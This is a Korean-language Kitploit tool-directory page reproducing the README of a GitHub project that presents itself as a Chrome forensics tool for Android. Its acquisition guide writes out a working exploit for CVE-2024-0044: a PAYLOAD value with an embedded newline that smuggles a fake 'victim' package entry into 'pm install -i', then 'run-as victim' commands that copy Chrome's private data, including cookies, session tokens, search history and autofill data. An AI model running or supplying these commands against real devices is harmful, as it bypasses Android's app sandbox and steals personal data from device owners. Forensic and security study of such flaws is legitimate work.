Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Chrome-Forensic_CVE-2024-0044 — Android 기기에서 Google Chrome 아티팩트를 추출하고 분석하기 위한 강력한 디지털 포렌식 도구 | Kitploit
도구/GitHubGitHub/jacktekno/chrome-forensic_cve-2024-0044
Android SecurityVulnerability AnalysisExploitationForensicsMobile ForensicsData RecoveryDigital ForensicsMobile SecurityLearning & Education

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubjacktekno/chrome-forensic_cve-2024-0044

Chrome-Forensic_CVE-2024-0044

Android 기기에서 Google Chrome 아티팩트를 추출하고 분석하기 위한 강력한 디지털 포렌식 도구

저장소 보기
17개월 전아직 검토되지 않음

🔍 Chrome Forensic - CVE-2024-0044

Version Python License Platform

Android 기기에서 Google Chrome 아티팩트를 추출하고 분석하기 위한 강력한 디지털 포렌식 도구

기능 • 설치 • 사용 • 문서


👤 작성자 정보

작성자: JackTekno
GitHub: github.com/JackTekno


📋 개요

이 도구는 CVE-2024-0044 (Run-as) 취약점을 활용하여 루팅되지 않은 Android 12/13 기기에서 권한 제한을 우회함으로써 Google Chrome 데이터의 포렌식 추출을 가능하게 합니다. 이 도구는 원시 SQLite 데이터베이스를 파싱하고 포괄적인 분석 보고서를 생성합니다.

🔄 프로세스 흐름

포렌식 분석 흐름도

획득부터 보고서 작성까지의 완전한 포렌식 분석 워크플로우


📊 기능 및 출력

이 도구는 다음 시트를 포함하는 포괄적인 Excel 보고서(result_chrome_forensic.xlsx)를 생성합니다:


🛠️ 사전 요구 사항

하드웨어 요구 사항

  • 📱 Android 휴대폰 (Android 12/13)
  • 💻 PC (Linux/Windows/Mac)

테스트 환경

  • 🐧 OS: Linux UOS 20 Professional

소프트웨어 요구 사항

  • 🐍 Python 3.x
  • 📲 ADB (Android Debug Bridge)
  • 📦 더미 APK 파일 (예: F-Droid.apk)

🚀 설치

  1. 저장소 클론

    root@kitploit:~
    git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
    cd Chrome-Forensic_CVE-2024-0044
    
  2. 의존성 설치

    root@kitploit:~
    pip install -r requirements.txt
    

🔓 데이터 획득 가이드

1단계: 기기 준비

  1. 설정 → 휴대전화 정보로 이동
  2. 빌드 번호를 7번 탭하여 개발자 옵션 활성화
  3. 설정 → 시스템 → 개발자 옵션으로 이동
  4. USB 디버깅 활성화
  5. USB로 휴대폰을 PC에 연결하고 연결을 승인

2단계: 익스플로잇 준비

root@kitploit:~
# Push a dummy APK to temporary folder
adb push F-Droid.apk /data/local/tmp/base.apk

3단계: 대상 UID 찾기

root@kitploit:~
adb shell pm list packages -U | grep com.android.chrome
# Output example: package:com.android.chrome uid:10129
# Note the UID (e.g., 10129)

4단계: 익스플로잇 실행

⚠️ 10129를 3단계에서 확인한 실제 Chrome UID로 교체하세요

root@kitploit:~
adb shell

# Inside ADB Shell:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"

# Trigger the package manager
pm install -i "$PAYLOAD" /data/local/tmp/base.apk

5단계: 데이터 추출

root@kitploit:~
# Still inside ADB Shell
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar

# Exit ADB Shell
exit

6단계: PC로 데이터 가져오기

root@kitploit:~
adb pull /data/local/tmp/chrome.tar .

7단계: 데이터 압축 해제

프로젝트 폴더에서 'chrome.tar' 파일의 압축을 해제하세요. 파일을 수동으로 이동할 필요는 없습니다. Python 스크립트가 압축 해제된 폴더 안의 데이터베이스 파일을 자동으로 찾습니다.

root@kitploit:~
tar -xf chrome.tar

💻 사용법

포렌식 분석 도구 실행:

root@kitploit:~
python3 chrome_forensic.py

도구가 데이터베이스 파일을 분석하고 같은 디렉터리에 result_chrome_forensic.xlsx를 생성합니다.


⚖️ 법적 고지

⚠️ 중요: 이 도구는 교육 및 승인된 포렌식 분석 목적으로만 설계되었습니다.

  • 소유한 기기 또는 분석에 대한 명시적 서면 허가를 받은 기기에만 사용하세요
  • 허가되지 않은 디지털 기기 접근은 해당 관할권의 법률을 위반할 수 있습니다
  • 저자는 이 도구의 오용에 대해 어떠한 책임도 지지 않습니다

🤝 기여

기여는 언제나 환영합니다! 자유롭게 Pull Request를 제출해 주세요.


📄 라이선스

이 프로젝트는 GNU General Public License v3.0에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.


👤 크레딧

획득 방법에 대한 개념 증명(PoC)은 Tinyhack.com이 요약하여 공유했습니다.


JackTekno가 ❤️로 제작

⭐ 이 저장소에 Star 표시 • 🐛 버그 신고 • 💡 기능 요청

도구 다운로드
시트 이름설명
📖 브라우징 기록방문한 URL의 상세 타임라인
📈 분석 – 상위 사이트가장 많이 방문한 도메인의 통계적 순위
⚠️ 알림 – 의심스러운 항목자동 플래그된 URL(해킹, 마약, 성인 콘텐츠)
📥 다운로드경로 및 파일 크기를 포함한 다운로드 기록
🔍 검색어옴니박스/Google의 사용자 검색 쿼리
🍪 쿠키 및 세션세션 토큰 및 쿠키 메타데이터(Hex 암호화)
✍️ 자동 완성 데이터저장된 양식 데이터(이름, 주소 등)